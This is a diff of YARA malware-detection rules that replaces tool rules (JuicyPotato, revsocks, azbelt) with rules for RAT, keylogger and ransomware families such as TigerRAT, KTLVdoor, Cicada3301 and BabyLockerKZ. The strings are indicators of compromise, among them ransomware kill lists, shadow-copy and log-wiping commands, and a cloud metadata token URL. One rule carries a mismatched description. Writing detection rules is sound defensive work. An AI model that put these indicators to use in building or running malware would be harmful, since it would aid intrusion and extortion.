+rule DITEKSHEN_MALWARE_Win_Tigerrat : FILE
 {
 	meta:
-		description = "Detect DiskCryptor open encryption solution that offers encryption of all disk partitions"
-		author = "ditekSHen"
-		id = "22b25d5c-d67f-53ac-9ae8-2de077afdda9"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects TigerRAT"
+		author = "ditekshen"
+		id = "37192fc8-1932-5f33-994a-bb319b131c58"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1209-L1232"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11738-L11756"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7ef0bf3b11f7e4055908518ce5b6a49e04d7002ebc3396fd2da32b4e13cf68e0"
+		logic_hash = "38a238339db7e7f573e0c7362af5a08654a9e134f902c0ecae441250a0364c64"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "\\DiskCryptor\\DCrypt\\" ascii
-		$s1 = "Error getting %sbootloader configuration" fullword wide
-		$s2 = "loader.iso" fullword wide
-		$s3 = "Bootloader config for [%s]" fullword wide
-		$s4 = "dc_get_mbr_config" fullword ascii
-		$s5 = "dc_encrypt_iso_image" fullword ascii
-		$s6 = "dc_start_re_encrypt" fullword ascii
-		$s7 = "dc_start_encrypt" fullword ascii
-		$s8 = "_w10_reflect_" ascii
-		$d1 = "\\DosDevices\\dcrypt" fullword wide
-		$d2 = "$dcsys$_fail_%x" fullword wide
-		$d3 = "%s\\$DC_TRIM_%x$" fullword wide
-		$d4 = "\\Device\\dcrypt" fullword wide
-		$d5 = "%s\\$dcsys$" fullword wide
-
-	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or 4 of ( $s* ) or 3 of ( $d* ) )
-}
-rule DITEKSHEN_INDICATOR_TOOL_PRI_Installerfiletakeover : CVE_2021_41379 FILE
-{
-	meta:
-		description = "Detect InstallerFileTakeOver CVE-2021-41379"
-		author = "ditekSHen"
-		id = "8581a306-e6d3-5ac1-a778-76c6505ee174"
-		date = "2024-09-25"
-		modified = "2024-09-25"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1234-L1253"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0a9e53138d33494d9b2aa0271b877e405ea2e8accba7c6eeac547caaa7a7c2ea"
-		score = 75
-		quality = 50
-		tags = "CVE-2021-41379, FILE"
-
-	strings:
-		$s1 = "splwow64.exe" fullword ascii
-		$s2 = "notepad.exe" fullword ascii
-		$s3 = "%s\\System32\\cmd.exe" fullword wide
-		$s4 = "[SystemFolder]msiexec.exe" fullword wide
-		$s5 = "microsoft plz" ascii
-		$s6 = "%TEMP%\\" fullword wide
-		$x1 = "\\InstallerFileTakeOver.pdb" ascii
-		$o1 = { 48 b8 fe ff ff ff ff ff ff 7f 48 8b f5 48 83 ce }
-		$o2 = { 4c 8d 62 10 48 c7 c7 ff ff ff ff 48 8b c7 66 0f }
-		$o3 = { ff 15 9a 59 00 00 48 8b d8 e8 ba ff ff ff 45 33 }
-		$o4 = { 49 c7 43 a8 fe ff ff ff 49 89 5b 10 48 8b 05 5a }
-		$o5 = { 66 89 7c 24 50 48 c7 c2 ff ff ff ff 48 ff c2 66 }
+		$m0 = ".?AVCryptorRC4@@" fullword ascii
+		$m1 = ".?AVModuleShell@@" fullword ascii
+		$m2 = ".?AVModuleKeyLogger@@" fullword ascii
+		$m3 = ".?AVModuleSocksTunnel@@" fullword ascii
+		$m4 = ".?AVModuleScreenCapture@@" fullword ascii
+		$m5 = ".?AVModulePortForwarder@@" fullword ascii
+		$s1 = "\\x9891-009942-xnopcopie.dat" fullword wide
+		$s2 = "(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]" fullword ascii
+		$s3 = "[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]" fullword ascii
+		$s4 = "~KPTEMP" fullword wide
+		$s5 = "del \"%s\"%s \"%s\" goto " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 2 of ( $s* ) or 3 of ( $o* ) ) ) or 4 of ( $s* ) or ( all of ( $o* ) and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) ) or ( 5 of ( $m* ) ) or ( 3 of ( $m* ) and 2 of ( $s* ) ) or ( 5 of them ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PRI_Juicypotato : FILE
+rule DITEKSHEN_MALWARE_Win_Ktlvdoor : FILE
 {
 	meta:
-		description = "Detect JuicyPotato"
-		author = "ditekSHen"
-		id = "2fb52598-9771-507b-a06d-7b9bc693ffee"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects KTLVdoor"
+		author = "ditekshen"
+		id = "f63ebd05-fb4b-50fb-887b-dacd379594a4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1255-L1270"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11758-L11791"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "43a7ac16b9633fd2e6c43ca142cd0d0e2166287bb51e1b6344119959fe054c19"
+		logic_hash = "3ced9b558c7e17acd015cd2c9dd0c5d024bf9c31c7f2e7c9b7b937124109cf8b"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$x1 = "\\JuicyPotato.pdb" ascii
-		$x2 = "JuicyPotato v%s" fullword ascii
-		$s1 = "hello.stg" fullword wide
-		$s2 = "ppVirtualProcessorRoots" fullword ascii
-		$s3 = "Lock already taken" fullword ascii
-		$s4 = "[+] authresult %d" fullword ascii
-		$s5 = "RPC -> send failed with error: %d" fullword ascii
-		$s6 = "Priv Adjust FALSE" fullword ascii
+		$s1 = "/cmd/acc/agent_acc" ascii
+		$s2 = "main.DLLWMain" ascii
+		$s3 = "main.checkSilent" ascii
+		$h1 = ".handleInteractiveShell" ascii
+		$h2 = ".handleNetstat" ascii
+		$h3 = ".handleProcess" ascii
+		$h4 = ".handleRefreshHostInfo" ascii
+		$h5 = ".handleTimestomp" ascii
+		$h6 = ".handleSoInject" ascii
+		$h7 = ".HandleRegInfo" ascii
+		$h8 = ".handlePortscan" ascii
+		$h9 = ".handleReflectDllInject" ascii
+		$h10 = ".handleFileDownload" ascii
+		$f1 = ".RdpWithNTLM." ascii
+		$f2 = ".FingerPrintOs." ascii
+		$f3 = ".ScanWMI." ascii
+		$f4 = ".ScanWinRM." ascii
+		$f5 = ".ScanWeb." ascii
+		$f6 = ".ScanSmb2." ascii
+		$f7 = ".ScanRDP." ascii
+		$f8 = ".ScanPing." ascii
+		$f9 = ".ScanOxid." ascii
+		$f10 = ".ScanMssql." ascii
+		$f11 = ".ScanBanner." ascii
+		$fr1 = /\.proxy[CS]2[CS](TC|UD)P/ ascii
+		$fr2 = /\.Scan(WMI|WinRM|Web|Smb2|RDP|Ping|Oxid|Mssql|Banner)\./ ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 5 of ( $s* ) ) )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and ( ( 6 of ( $h* ) ) or ( 12 of ( $f* ) ) or ( 2 of ( $h* ) and 4 of ( $f* ) ) or ( 1 of ( $s* ) and ( 4 of ( $h* ) or 4 of ( $f* ) ) ) or ( 13 of them ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_ENUM_Sharpshares : FILE
+rule DITEKSHEN_MALWARE_Win_Fakecaptcha_Downloader : FILE
 {
 	meta:
-		description = "Detects SharpShares multithreaded C# .NET Assembly to enumerate accessible network shares in a domain"
-		author = "ditekSHen"
-		id = "1da53e34-21a3-5b3c-885e-dcc8814ac3c8"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects downloader executables dropped by fake captcha"
+		author = "ditekshen"
+		id = "d577e8ef-11df-565c-9925-63b8768a7115"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1290-L1305"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11793-L11803"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8b35d6a692814e1b27ffc1db4ab124bf621c156aaf57f24796c422ec95a85715"
+		logic_hash = "57c39ce93f74d03767e7fde53281983a8462e4f3705d1bb9084bc169a08a0f83"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "SharpShares." ascii wide
-		$s2 = "GetComputerShares" fullword ascii
-		$s3 = "userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*)(!(userAccountControl:1.2" wide
-		$s4 = "GetAllShares" fullword ascii
-		$s5 = "stealth:" wide
-		$s6 = "(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*))" fullword wide
-		$s7 = /\/targets|ldap|threads/ wide
-		$s8 = "entriesread" fullword ascii
+		$s1 = "</script>MZ" ascii
+		$s2 = "window.close();" ascii
+		$s3 = "eval(" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PROX_Revsocks : FILE
+rule DITEKSHEN_MALWARE_Win_Xenorat : FILE
 {
 	meta:
-		description = "Detects revsocks Reverse socks5 tunneler with SSL/TLS and proxy support"
-		author = "ditekSHen"
-		id = "f85bc557-40ab-5533-8a89-a2de9bbc9ad9"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects Blacksuit"
+		author = "ditekshen"
+		id = "7f27ebef-8a0e-591a-a926-ac950db86053"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1307-L1321"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11805-L11820"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4a8e68f25b7ba10b0eb9772ed4ba2b9c6566768f2b5a2859df8bac644d196bf3"
+		logic_hash = "487046464f545fb9e4a1d6e277cdc010eac6886583f0b388555a483d9021191b"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "main.agentpassword" fullword ascii
-		$s2 = "main.connectForSocks" fullword ascii
-		$s3 = "main.connectviaproxy" fullword ascii
-		$s4 = "main.DnsConnectSocks" fullword ascii
-		$s5 = "main.listenForAgents" fullword ascii
-		$s6 = "main.listenForClients" fullword ascii
-		$s7 = "main.getPEMs" fullword ascii
+		$x1 = "xeno rat client" wide
+		$x2 = "xeno_rat_client." ascii
+		$x3 = "xeno rat client" ascii
+		$s1 = "+<AddToStartupNonAdmin>" ascii
+		$s2 = "+<ConnectAndSetupAsync>" ascii
+		$s3 = "+<SendUpdateInfo>" ascii
+		$s4 = "+<RecvAllAsync_ddos_" ascii
+		$s5 = "Plugin.Chromium+<Get" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 4 of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) ) or ( 2 of ( $x* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Azbelt : FILE
+rule DITEKSHEN_MALWARE_Multi_POOLRAT : FILE
 {
 	meta:
-		description = "Detects azbelt for enumerating Azure related credentials primarily on AAD joined machines"
-		author = "ditekSHen"
-		id = "cf9268d2-1928-51e8-9643-ee0a5bada9fa"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects POOLRAT"
+		author = "ditekshen"
+		id = "5831b479-592d-591b-88b4-73102fe4b6ec"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1323-L1338"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11822-L11839"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "71cc2b3418ea5e285adafe03fa80bade67dc3e4073fe58d42bc6190860b48b43"
+		logic_hash = "efc5881975e97583188d43a8a6b0eb59bb7103664897cc0f88ddc4d2376bd842"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "MALWARE.Osx.Trojan.POOLRAT"
+		clamav2 = "MALWARE.Linux.Trojan.POOLRAT"
 
 	strings:
-		$s1 = "@http://169.254.169.254/metadata/identity/oauth2/token?api-version=" ascii
-		$s2 = "@Partner Customer Delegated Admin Offline Processor" fullword ascii
-		$s3 = "@TargetName: " fullword ascii
-		$s4 = "httpclient.nim" fullword ascii
-		$s5 = "@DSREG_DEVICE_JOIN" fullword ascii
-		$s6 = "@.azure/msal_token_cache.bin" fullword ascii
-		$s7 = "CredEnumerateW" fullword ascii
-		$s8 = "@http://169.254.169.254/metadata/instance?api-version=" ascii
+		$s1 = "MSG_CmdP" ascii
+		$s2 = "MSG_WriteConfigP" ascii
+		$s3 = "MSG_SecureDelP" ascii
+		$s4 = "ConnectToProxyP" ascii
+		$s5 = "MSG_KeepConP" ascii
+		$s6 = "MSG_SleepP" ascii
+		$s7 = "MSG_TestP" ascii
+		$s8 = "MSG_SetPathP" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		( uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf or uint16( 0 ) == 0xfeca ) and 7 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Dontsleep : FILE
+rule DITEKSHEN_MALWARE_Multi_Pondrat : FILE
 {
 	meta:
-		description = "Detects Keep Host Unlocked (Don't Sleep)"
-		author = "ditekShen"
-		id = "f71bd0d5-a526-5f1e-8bd3-9e653db610a7"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects PondRAT"
+		author = "ditekshen"
+		id = "cb8cca87-6b5e-5984-8a73-9f800b262d77"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1340-L1354"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11841-L11858"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b8e2132d3b36c3e2d2662a586916c7e4fc029f81af08b5c18006833c4e6f772f"
+		logic_hash = "affa35f789725d3a8cea8dc95744c4e771690fde5f73936d0806a8c9f72fdb2e"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "MALWARE.Osx.Trojan.PondRAT"
+		clamav2 = "MALWARE.Linux.Trojan.PondRAT"
 
 	strings:
-		$s1 = ":Repeat###DEL \"%s\"###if exist \"%s\" goto Repeat###DEL \"%s\"###" wide
-		$s2 = "powrprof.dll,SetSuspendState" wide
-		$s3 = "_selfdestruct.bat" wide
-		$s4 = "please_sleep_block_" ascii
-		$s5 = "Browser-Type: MiniBowserOK" wide
-		$s6 = "m_use_all_rule_no_sleep" ascii
-		$s7 = "BlockbyExecutionState: %d on:%d by_enable:%d" fullword wide
+		$s1 = "MsgDown" ascii
+		$s2 = "MsgUp" ascii
+		$s3 = "MsgRun" ascii
+		$s4 = "MsgCmd" ascii
+		$s5 = "CryptPayload" ascii
+		$s6 = "RecvPayload" ascii
+		$s7 = "csleepi" ascii
+		$s8 = "FConnectProxy" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		( uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf or uint16( 0 ) == 0xfeca ) and 7 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Nsudo : FILE
+rule DITEKSHEN_MALWARE_Win_Cicada3301 : FILE
 {
 	meta:
-		description = "Detects NSudo allowing to run processes as TrustedInstaller or System"
-		author = "ditekShen"
-		id = "9a21b923-b02e-553b-8f53-026d7034c319"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects Cicada3301"
+		author = "ditekshen"
+		id = "0aebee9f-177d-5a1b-87e0-8797fb6f6823"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1356-L1369"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11860-L11885"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6bcffa79ca06b0b4178d6ea256f98d917c2b19cec0b059889b8d015d226a53f9"
+		logic_hash = "b8b7596bc8ae01b89742e17bd3dbfcc1e2fad486cc6ea19c8de813fc677509f4"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "MALWARE.Win.Ransomware.Cicada3301"
 
 	strings:
-		$x1 = "cmd /c start \"NSudo." wide
-		$x2 = "*\\shell\\NSudo" fullword wide
-		$x3 = "Projects\\NSudo\\Output\\Release\\x64\\NSudo.pdb" ascii
-		$s1 = "-ShowWindowMode=Hide" wide
-		$s2 = "?what@exception@@UEBAPEBDXZ" fullword ascii
-		$s3 = "NSudo.RunAs." ascii
+		$s1 = "cmd/Cchcp 65001 >nulnet view \\\\"
+		$s2 = "create_file_recovery"
+		$s3 = "ecnrypted_files_full"
+		$s4 = "get_excluded_directories"
+		$s5 = "collect_files_except"
+		$s6 = ".exe4d5a" ascii
+		$s7 = "-accepteula -s -d \"\" --" ascii
+		$s8 = "[*.exe*.EXE*.DLL*.ini*.inf*.pol*.cmd*.ps1*.vbs*.bat*.pagefile.sys*.hiberfil.sys*.drv" ascii
+		$s9 = "memtasveeamsvc$backupsqlvssmsexchangesql$mysqlmysql$sophosMSExchange" ascii
+		$s10 = "-DATA.txt" ascii
+		$s11 = /--no_(local|net|impl)/ fullword ascii
+		$c1 = "fsutil" ascii
+		$c2 = "iisreset" ascii
+		$c3 = "vssadmin" ascii
+		$c4 = "wmic" ascii
+		$c5 = "bcdedit" ascii
+		$c6 = "wevtutil" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) or all of ( $s* ) or 4 of them )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( 4 of ( $c* ) and 4 of ( $s* ) ) or ( all of ( $c* ) and 2 of ( $s* ) ) or 9 of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Ligolo : FILE
+
+rule DITEKSHEN_MALWARE_Win_Fpspy : FILE
 {
 	meta:
-		description = "Detects Ligolo tool for establishing SOCKS5 or TCP tunnels from a reverse connection"
-		author = "ditekSHen"
-		id = "cc461fd1-9a2f-59ce-af74-a0f55b8850b1"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "FPSpy"
+		author = "ditekshen"
+		id = "39d3be12-1b06-57b1-b3c2-2cbd13a17b03"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1371-L1385"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11887-L11916"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b515dc184013c2f67d37e42d7172e2471b3a93c94024be12c7f587296287282d"
+		logic_hash = "c26736c7f056f3d13c58e724fda601e88468e2386852b072a37c6646fb5ef8f9"
 		score = 75
 		quality = 73
 		tags = "FILE"
+		clamav1 = "MALWARE.Win.Trojan.FPSpy"
 
 	strings:
-		$p1 = "/ligolo/main.go" ascii
-		$p2 = "/armon/go-socks5" ascii
-		$s1 = "main.StartLigolo" fullword ascii
-		$s2 = "main.handleRelay" fullword ascii
-		$s3 = "main.startSocksProxy" fullword ascii
-		$s4 = "_main.tlsFingerprint" fullword ascii
-		$s5 = "main.verifyTlsCertificate" fullword ascii
+		$f1 = "[Analys_Spy]" wide
+		$f2 = "[DeletePoorDll]" wide
+		$f3 = "[DownloadProc]" wide
+		$f4 = "[DragWarp]" wide
+		$f5 = "[GetCoolDir]" wide
+		$f6 = "[JackSleep]" wide
+		$f7 = "[KillCmdExe]" wide
+		$f8 = "[PsDownProc]" wide
+		$f9 = "[PsUpProc]" wide
+		$f10 = "[ReadFileFromPacket]" wide
+		$f11 = "[RemoteDropExec]" wide
+		$f12 = "[RemoteExec]" wide
+		$f13 = "[RemoteInject]" wide
+		$f14 = "[SendHttpForUpload]" wide
+		$s1 = "MazeFunc" fullword ascii
+		$s2 = /(Exit|Update|Drop)_EVT/ fullword ascii
+		$s3 = "Key.dat" fullword ascii
+		$s4 = "%sSysInfo_%02d_%02d_%02d.txt" fullword ascii
+		$s5 = "cmd /c systeminfo >> %s" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"" fullword ascii
+		$s7 = "FPSpy" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( ( all of ( $p* ) and 1 of ( $s* ) ) or all of ( $s* ) or ( 1 of ( $p* ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( ( pe.exports ( "MazeFunc" ) and 2 of ( $f* ) and 1 of ( $s* ) ) or ( 6 of ( $f* ) and 1 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $f* ) ) or ( 8 of ( $f* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Extpassword : FILE
+rule DITEKSHEN_MALWARE_Win_Klogexe : FILE
 {
 	meta:
-		description = "Detects ExtPassword External Drive Password Recovery"
-		author = "ditekSHen"
-		id = "bb06d2c1-964d-5a3d-a741-09b8ef5ac7fa"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects KLogExe"
+		author = "ditekshen"
+		id = "8c3ebc2c-717b-5c42-9233-274006d4331b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1387-L1403"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11918-L11937"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "525530cb7e9f44be0408fd710306f90056b1b6b9a9e4779d8c1eb1ddef443fb0"
+		logic_hash = "1f1809b83dc468122022b68d63734ba1597c6fede01582c31d1700ca0b9e1e22"
 		score = 75
-		quality = 50
+		quality = 73
 		tags = "FILE"
+		clamav1 = "MALWARE.Win.Trojan.KLogExe"
 
 	strings:
-		$x1 = "ExtPassword!" fullword wide
-		$s2 = "GReading Chrome password file: %s" fullword wide
-		$s3 = "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy%d" fullword wide
-		$s4 = "2015-07-27 13:49:41 b8e92227a469de677a66da62e4361f099c0b79d0" ascii
-		$s5 = "metadata WHERE id = 'password'" ascii
-		$s6 = /Scanning\s(Credentials\sfolder|Credentials\sfolder|Firefox\sand\sother\sMozilla\sWeb\sbrowsers|Chromium-based\Web\browsers|Outlook\saccounts|Windows\sVault|dialup\/VPN\sitems|wireless\skeys|Windows\ssecurity\squestions|vault\spasswords)/ wide
-		$s7 = "lhelp32Snapsho" fullword ascii
-		$s8 = "SELECT origin_" fullword ascii
-		$s9 = "password#Ck" fullword ascii
+		$s1 = "[clip_s]: %s" ascii
+		$s2 = "------ %d/%d/%d : %d/%d ------" ascii
+		$s3 = "[RWin+]" ascii
+		$s4 = "[Too many clip_tail]" ascii
+		$s5 = "name=\"userfile\"; filename=\"%s\"" ascii
+		$s6 = "Origin: http://" wide
+		$s7 = "%s_%d_%d_%d_%d" wide
+		$s8 = "/wp-content/include.php?_sys_" wide
+		$s9 = "\\desktops.ini" wide
+		$s10 = "KLogExe" wide nocase
+		$s11 = "dynamic_import.cpp [resolve_call] can`nt" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 3 of ( $s* ) ) or 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Ngrok : FILE
+rule DITEKSHEN_MALWARE_Win_Babylockerkz : FILE
 {
 	meta:
-		description = "Detects Ngrok"
-		author = "ditekSHen"
-		id = "fc0a0de8-b68b-5b6b-a222-bbc031ebabd3"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects BabyLockerKZ"
+		author = "ditekshen"
+		id = "faa35818-2bed-528f-a6f0-5356a723ef5b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1405-L1418"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11939-L11957"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f4bba142652aaf77e5b7c123b743cf165ae17210c39cf65b7311f7e7bd91f7e1"
+		logic_hash = "423bbd3b23591608a32e4e724c156fbaa5d1d087515137a82a0aeb8c4865d1ca"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "dashboard.ngrok.com" ascii
-		$s2 = "go.ngrok.com/cmd/ngrok/main.go" ascii
-		$s3 = "ngrok agent" ascii
-		$s4 = "*ngrok.clientInfo" ascii
-		$s5 = "'%s'  socket: '%s'  port: %d/edges/https/{{ .EdgeID }}/routes/{{ .ID }}/webhook_" ascii
-		$s6 = "/{{ .ID }}/tunnel_sessions/{{ .ID }}/restart" ascii
+		$s1 = ":\\locker\\bin\\stub_win_x64_encrypter.pdb" ascii
+		$s2 = "taskkill /f /im explorer.exe" fullword wide
+		$s3 = "\\SysWOW64\\cmd.exe /c %windir%\\" wide
+		$s4 = "[!] Failed to RunNonElevated: %s, error 0x%X" fullword wide
+		$s5 = "[!] Failed to run sync command: %s, error 0x%X" fullword wide
+		$s6 = "[-] RunNonElevated: %s" fullword wide
+		$s7 = "[!][Encrypt] Not" fullword
+		$s8 = "[-] sALLUSERSPROFILE: %s" fullword wide
+		$s9 = "[!] WNetGetConnection failed 0x%X" fullword wide
+		$s10 = "[!][Scan] " wide
+		$s11 = "[-] Start encrypt" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( 3 of them )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Sqlrecon : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Bazarloader : FILE
 {
 	meta:
-		description = "Detects SQLRecon C# MS-SQL toolkit designed for offensive reconnaissance and post-exploitation"
-		author = "ditekSHen"
-		id = "ec91285b-690d-5fd3-b0fc-f8d72cbb7e15"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects Bazar executables with specific email addresses found in the code signing certificate"
+		author = "ditekShen"
+		id = "94b814e3-56c2-5cdb-9335-c92eea8ec668"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1420-L1436"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L11-L21"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
